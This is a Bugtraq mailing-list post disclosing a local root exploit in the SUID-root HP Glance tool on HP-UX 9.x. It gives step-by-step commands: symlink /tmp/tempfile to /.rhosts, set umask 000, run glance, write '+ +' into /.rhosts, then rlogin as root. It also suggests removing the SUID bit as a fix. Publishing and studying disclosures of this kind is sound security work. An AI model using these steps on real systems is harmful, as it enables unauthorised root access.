Bugtraq: Vunerability in HP Glance ?

[jjacobi () nova umuc edu (John W. Jacobi)]

Hi again,

If this is out or old, I apologize.

Platform I exploited: HP 9000/700/HPUX9.05 & HP9000/800/HPUX9.04

Product I exploited: HP Glance version B.09.04

What I gained: root access in under a minute without the root password.

Subject: Creating a file as root, with world write permissions using HP
Glance,
while not being root, or truncating any file on the system.

Problem: You could create /.rhosts , /etc/hosts.equiv , or whatever else
your heart desires
and then place arbitrary contents in it.  Perhaps in the case of the
r-command files a + +
would suffice.  Or you could truncate any file that root can.

Possible short term resolution: Remove the SUID-ROOT thing off of
glance.

How I exploited to get quick root access:

1. I logged in as my regular account.
2. I checked for a root .rhosts file, it did not exist.
3. I made a sym link called /tmp/tempfile to roots would be .rhosts file
like so:
        ln -s /.rhosts /tmp/tempfile
4. I set my umask to 000:
        umask 000
5. I ran glance with the following command line:
        glance -j 1 -f /tmp/tempfile -iterations 1
6. Thanks to glance the /.rhosts file suddenly appeared and was mode
666, sweet.
7. Next I typed (I could have vi'ed or something as well):
        echo "+ +" > /.rhosts
8. Then:
        rlogin localhost -l root
9. And, not surprisingly, I was logged in as root.

Of course a little C program would be nice to automate this, but what if
the C
compiler is not installed ?  You might still want to be root, wouldn’t
you ???

Question:  Since there seems to be many of these little beasties in
HP-UX,
does anyone know if the problem is of a single source, or just a lot of
vulnerable programs.

Any feedback would be greatly appreciated...

John W. Jacobi